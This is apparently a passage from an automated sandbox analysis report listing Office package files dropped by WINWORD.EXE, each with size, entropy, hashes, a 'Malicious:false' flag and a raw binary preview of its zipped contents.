                                                                                      Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):608122
                                                                                      Entropy (8bit):7.729143855239127
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                      MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                      SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                      SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                      SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                      Malicious:false
                                                                                      Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):5783
                                                                                      Entropy (8bit):7.88616857639663
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                      MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                      SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                      SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                      SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                      Malicious:false
                                                                                      Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):4026
                                                                                      Entropy (8bit):7.809492693601857
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                      MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                      SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                      SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                      SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                      Malicious:false
                                                                                      Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):4243
                                                                                      Entropy (8bit):7.824383764848892
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                      MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                      SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                      SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                      SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                      Malicious:false
                                                                                      Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):16806
                                                                                      Entropy (8bit):7.9519793977093505
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                      MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                      SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                      SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                      SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):11380
                                                                                      Entropy (8bit):7.891971054886943
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                      MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                      SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                      SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                      SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):6024
                                                                                      Entropy (8bit):7.886254023824049
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                      MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                      SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                      SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                      SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):9191
                                                                                      Entropy (8bit):7.93263830735235
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                      MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                      SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                      SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                      SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                      Malicious:false
                                                                                      Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):4326
                                                                                      Entropy (8bit):7.821066198539098
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                      MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                      SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                      SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                      SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                      Malicious:false
                                                                                      Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):7370
                                                                                      Entropy (8bit):7.9204386289679745
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                      MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                      SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                      SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                      SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                      Malicious:false
                                                                                      Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):5596
                                                                                      Entropy (8bit):7.875182123405584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                      MD5:CDC1493350011DB9892100E94D5592FE
                                                                                      SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                      SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                      SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3683
                                                                                      Entropy (8bit):7.772039166640107
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                      MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                      SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                      SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                      SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                      Malicious:false
                                                                                      Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):4888
                                                                                      Entropy (8bit):7.8636569313247335
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                      MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                      SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                      SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                      SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                      Malicious:false
                                                                                      Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):6448
                                                                                      Entropy (8bit):7.897260397307811
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                      MD5:42A840DC06727E42D42C352703EC72AA
                                                                                      SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                      SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
